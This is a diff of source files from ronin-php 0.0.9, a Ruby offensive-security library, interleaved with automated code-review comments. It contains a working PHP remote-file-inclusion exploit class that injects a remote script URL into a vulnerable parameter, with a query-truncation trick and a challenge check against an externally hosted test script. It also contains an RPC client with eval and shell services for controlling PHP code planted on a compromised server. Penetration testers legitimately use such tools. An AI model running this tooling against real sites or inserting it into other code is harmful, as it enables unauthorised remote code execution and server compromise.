ronin-php 0.0.9

@@ -0,0 +1,127 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/network/http'
25
+ require 'ronin/extensions/uri'
26
+ require 'ronin/formatting/digest'
27
+ require 'ronin/chars'
28
+
29
+ module Ronin
30
+ module PHP
31
+ class RFI
32
+
33
+ # Default URL of the RFI Test script
34
+ TEST_SCRIPT = 'http://ronin.rubyforge.org/dist/php/rfi/test.php'
35
+
36
+ # Prefix text that will appear before the random RFI challenge string
37
+ CHALLENGE_PREFIX = 'PHP RFI Response: '
38
+
39
+ # RFI vulnerable url
40
+ attr_reader :url
41
+
42
+ # RFI vulnerable query parameter
43
+ attr_reader :param
44
+
45
+ # Whether to terminate the RFI script url with a null byte
46
+ attr_accessor :terminate
47
+
48
+ # URL of the RFI Test script
49
+ attr_accessor :test_script
50
+
51
+ #
52
+ # Creates a new RFI object with the specified _url_, _param_ and given
53
+ # _options_.
54
+ #
55
+ # _options may contain the following keys:
56
+ # <tt>:terminate</tt>:: Whether or not to terminate the RFI script url
57
+ # with a null byte. Defaults to +true+.
58
+ # <tt>:test_script</tt>:: URL of RFI test script. Defaults to
59
+ # TEST_SCRIPT.
60
+ #
61
+ def initialize(url,param,options={})
62
+ @url = url
63
+ @param = param
64
+
65
+ if options.has_key?(:terminate)
66
+ @terminate = options[:terminate]
67
+ else
68
+ @terminate = true
69
+ end
70
+
71
+ @test_script = (options[:test_script] || TEST_SCRIPT)
72
+ end
73
+
74
+ #
75
+ # Returns +true+ if the RFI script url will be terminated with
76
+ # a null byte, returns +false+ otherwise.
77
+ #
78
+ def terminate?
79
+ @terminate == true
80
+ end
81
+
82
+ #
83
+ # Builds a RFI url to include the specified _script_url_.
84
+ #
85
+ def url_for(script_url)
86
+ script_url = URI(script_url.to_s)
87
+ new_url = URI(@url.to_s)
88
+
89
+ new_url.query_params.merge!(script_url.query_params)
90
+ script_url.query_params.clear
91
+
92
+ script_url = "#{script_url}?" if terminate?
93
+
94
+ new_url.query_params[@param.to_s] = script_url
95
+ return new_url
96
+ end
97
+
98
+ #
99
+ # Include the specified RFI _script_ using the given _options_.
100
+ #
101
+ def include(script,options={})
102
+ options = options.merge(:url => url_for(script))
103
+
104
+ if options[:method] == :post
105
+ return Net.http_post_body(options)
106
+ else
107
+ return Net.http_get_body(options)
108
+ end
109
+ end
110
+
111
+ #
112
+ # Returns +true+ if the url is vulnerable to RFI, returns +false+
113
+ # otherwise.
114
+ #
115
+ def vulnerable?(options={})
116
+ challenge = Chars.alpha_numeric.random_string(10).md5
117
+
118
+ test_url = URI(@test_script.to_s)
119
+ test_url.query_params['rfi_challenge'] = challenge
120
+
121
+ response = include(test_url,options)
122
+ return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
123
+ end
124
+
125
+ end
126
+ end
127
+ end
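Review bot: The comments on `attr_accessor :terminate`, on the `:terminate` option and on `terminate?` all say the script URL is terminated with a null byte, but `url_for` appends a literal `?` (`script_url = "#{script_url}?" if terminate?`), so the documentation does not describe what the code does. Reword the comments to match the behaviour, e.g. `# Whether to append a trailing '?' to the RFI script url`. Separately, `terminate?` tests `@terminate == true`, so a truthy non-boolean option value such as `1` silently turns termination off; `!!@terminate` would follow normal Ruby truthiness. In `vulnerable?`, `response.include?` assumes the HTTP helper always returns a String; if it can return nil on a failed request this raises NoMethodError instead of returning `false` as documented.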
@@ -0,0 +1,28 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/php/call'
25
+ require 'ronin/rpc/php/client'
26
+ require 'ronin/rpc/php/console'
27
+ require 'ronin/rpc/php/shell'
28
+ require 'ronin/rpc/php/rfi'
@@ -0,0 +1,45 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/call'
25
+ require 'ronin/formatting/binary'
26
+
27
+ require 'xmlrpc/client'
28
+
29
+ module Ronin
30
+ module RPC
31
+ module PHP
32
+ class Call < RPC::Call
33
+
34
+ #
35
+ # Encodes the call and the given _session_ variables into a base64
36
+ # encoded XMLRPC call message.
37
+ #
38
+ def encode(session={})
39
+ XMLRPC::Create.new.methodCall(@name,session,*(@arguments)).base64_encode
40
+ end
41
+
42
+ end
43
+ end
44
+ end
45
+ end
@@ -0,0 +1,152 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/php/call'
25
+ require 'ronin/rpc/php/response'
26
+ require 'ronin/rpc/php/console'
27
+ require 'ronin/rpc/php/shell'
28
+ require 'ronin/rpc/client'
29
+ require 'ronin/network/http'
30
+
31
+ module Ronin
32
+ module RPC
33
+ module PHP
34
+ class Client < RPC::Client
35
+
36
+ # URL of RPC server
37
+ attr_reader :url
38
+
39
+ # Proxy to send requests through
40
+ attr_accessor :proxy
41
+
42
+ # User-Agent string to send with each request
43
+ attr_accessor :user_agent
44
+
45
+ # Session data
46
+ attr_reader :session
47
+
48
+ # Provides a console service
49
+ service :console, Console
50
+
51
+ # Provides a shell service
52
+ service :shell, Shell
53
+
54
+ #
55
+ # Creates a new Client object with the specified _url_ and the
56
+ # given _options_.
57
+ #
58
+ # _options_ may contain the following keys:
59
+ # <tt>:proxy</tt>:: The proxy settings to use when communicating
60
+ # with the server.
61
+ # <tt>:user_agent</tt>:: The User-Agent to send to the server.
62
+ # <tt>:user_agent_alias</tt>:: The User-Agent alias to send to
63
+ # the server.
64
+ #
65
+ def initialize(url,options={})
66
+ @url = url
67
+
68
+ @proxy = options[:proxy]
69
+
70
+ if options[:user_agent_alias]
71
+ @user_agent = Web.user_agent_alias[options[:user_agent_alias]]
72
+ else
73
+ @user_agent = options[:user_agent]
74
+ end
75
+
76
+ @cookie = nil
77
+ @session = {}
78
+ end
79
+
80
+ def call_url(call_object)
81
+ new_url = URI(@url.to_s)
82
+ new_url.query_params['rpc_call'] = call_object.encode(@session)
83
+
84
+ return new_url
85
+ end
86
+
87
+ #
88
+ # Returns +true+ if the RPC server is running and responding to
89
+ # function calls, returns +false+ otherwise.
90
+ #
91
+ def running?
92
+ call(:running)
93
+ end
94
+
95
+ #
96
+ # Returns a finger-print of the PHP server.
97
+ #
98
+ def fingerprint
99
+ call(:fingerprint)
100
+ end
101
+
102
+ protected
103
+
104
+ #
105
+ # Creates a new Call object for the specified _funtion_ and
106
+ # _arguments_.
107
+ #
108
+ def create_call(function,*arguments)
109
+ Call.new(function,*arguments)
110
+ end
111
+
112
+ #
113
+ # Sends the specified _call_object_ to the RPC server. Returns
114
+ # a new Response object that represents the server's response.
115
+ #
116
+ def send_call(call_object)
117
+ resp = Net.http_get(:url => call_url(call_object),
118
+ :cookie => @cookie,
119
+ :proxy => @proxy,
120
+ :user_agent => @user_agent)
121
+
122
+ new_cookie = resp['Set-Cookie']
123
+ @cookie = new_cookie if new_cookie
124
+
125
+ return Response.new(resp.body)
126
+ end
127
+
128
+ #
129
+ # Returns the return-value of a previous function call encoded
130
+ # into the specified _response_. If the _response_ contains
131
+ # a fault message, the fault exception will be raised.
132
+ #
133
+ def return_value(response)
134
+ status, params = response.decode
135
+
136
+ unless status
137
+ raise(params)
138
+ end
139
+
140
+ @session.merge!(params['session'])
141
+
142
+ if params.has_key?('output')
143
+ print(params['output'])
144
+ end
145
+
146
+ return params['return_value']
147
+ end
148
+
149
+ end
150
+ end
151
+ end
152
+ end
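Review bot: `return_value` trusts the shape of the decoded remote response: `@session.merge!(params['session'])` raises TypeError when the response carries no `session` member, and `params.has_key?('output')` fails if the decoded value is not a Hash. Because this data comes from the remote host, guard it, e.g. `@session.merge!(params['session']) if params['session'].kind_of?(Hash)`. The `print(params['output'])` line also writes server-supplied bytes straight to the operator's terminal, so control sequences in the output reach the console unfiltered; stripping non-printable characters before printing would be safer. In `initialize`, `Web.user_agent_alias` is referenced but no require that would define `Web` is visible in this file, so the `:user_agent_alias` option may raise NameError unless another file loads it. `call_url` is also the only public method here without a comment.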
@@ -0,0 +1,42 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/console'
25
+
26
+ module Ronin
27
+ module RPC
28
+ module PHP
29
+ class Console < RPC::Console
30
+
31
+ #
32
+ # Evaluates the specified _string_ of PHP code and returns the
33
+ # result.
34
+ #
35
+ def eval(string)
36
+ call(:eval,string)
37
+ end
38
+
39
+ end
40
+ end
41
+ end
42
+ end
@@ -0,0 +1,63 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/rpc/exceptions/response_missing'
25
+ require 'ronin/rpc/response'
26
+
27
+ require 'xmlrpc/client'
28
+
29
+ module Ronin
30
+ module RPC
31
+ module PHP
32
+ class Response < RPC::Response
33
+
34
+ #
35
+ # Returns the default XML parser to use for parsing XMLRPC
36
+ # responses.
37
+ #
38
+ def Response.parser
39
+ @@parser ||= XMLRPC::XMLParser::REXMLStreamParser.new
40
+ end
41
+
42
+ def Response.parser=(new_parser)
43
+ @@parser = new_parser
44
+ end
45
+
46
+ #
47
+ # Decodes the XMLRPC response message embedded in the response
48
+ # from the server.
49
+ #
50
+ def decode
51
+ response = @contents[/<rpc>.*<\/rpc>/m]
52
+
53
+ unless response
54
+ raise(ResponseMissing,"failed to receive a valid RPC method response",caller)
55
+ end
56
+
57
+ return Response.parser.parseMethodResponse(response)
58
+ end
59
+
60
+ end
61
+ end
62
+ end
63
+ end
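Review bot: The extraction regexp in `decode`, `/<rpc>.*<\/rpc>/m`, is greedy, so when the page contains more than one `</rpc>` the match runs from the first `<rpc>` to the last `</rpc>` and the parser is handed unrelated markup; `/<rpc>.*?<\/rpc>/m` takes the first complete envelope. `decode` also lets any parser exception from malformed XML propagate as-is even though the body is controlled by the remote side; rescuing the parse error and re-raising `ResponseMissing` would give callers a single failure type to handle. `Response.parser=` has no comment, and the `@@parser` class variable is shared with every subclass of `Response`; a class-level instance variable (`@parser ||= ...`) avoids that coupling.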